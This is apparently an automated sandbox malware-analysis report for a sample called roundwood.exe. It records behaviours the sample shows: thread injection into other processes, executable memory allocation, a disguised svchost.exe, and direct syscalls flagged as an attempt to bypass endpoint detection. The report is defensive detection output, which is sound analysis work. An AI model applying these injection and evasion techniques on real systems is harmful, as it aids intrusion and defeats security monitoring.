Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 6D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2330000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2890000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2930000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 740000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3060000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3030000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 20C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2D20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: EA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Windows\apppatch\svchost.exe base: 3240000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Windows\apppatch\svchost.exe base: 3240000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00401B70 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	0_2_00401B70
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00401B70 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	2_2_00401B70
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D248D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	2_2_02D248D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_013048D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	4_2_013048D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E548D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	5_2_00E548D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E948D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	8_2_00E948D0

Creates a thread in another existing process (thread injection)

Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 1241360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: DD1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: C51360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 1411360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 901360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 1451360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 2B31360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 2921360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 8E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 29F1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 2921360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 2411360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 27F1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 28C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe EIP: 2761360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 29E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2C91360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 3091360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2141360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2741360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2AA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2501360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 3181360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 26C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2651360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: B31360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: AA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2611360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2E31360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2911360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: B21360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2C81360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2DA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2261360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 27E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2361360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 29C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2BC1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 12E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2A01360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 26C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2F11360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 21B1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2C81360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2B41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2AD1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 3031360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 25C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2591360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 22C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2E01360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 24E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 23B1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2981360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 901360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2B61360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2251360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 27A1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 24E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2651360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2B11360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2AF1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2591360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 29A1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 7B1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2F71360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 7C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2B31360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 12A1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 6D1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2BB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2331360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2B81360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2891360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2931360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2DB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 741360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 3061360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2DA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2B61360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 3031360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 20C1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2D21360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: EA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2C91360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 27D1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2901360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2E31360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2F51360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2BD1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 3241360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 3241360	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtDeleteValueKey: Direct from: 0x76EF37FC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtSetInformationFile: Direct from: 0x76EF2D0C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtSetInformationThread: Direct from: 0x76EF2ECC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtEnumerateValueKey: Direct from: 0x76EF2BAC	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtCreateMutant: Direct from: 0x2D168B8
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtCreateMutant: Direct from: 0x2D037CB
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtCreateMutant: Direct from: 0x28C14F7
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtUnmapViewOfSection: Direct from: 0x76EF2D3C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtSetValueKey: Direct from: 0x76EF309C	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtSetTimerEx: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtEnumerateKey: Direct from: 0x76EF2DBC
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	NtQuerySystemInformation: Direct from: 0x1C
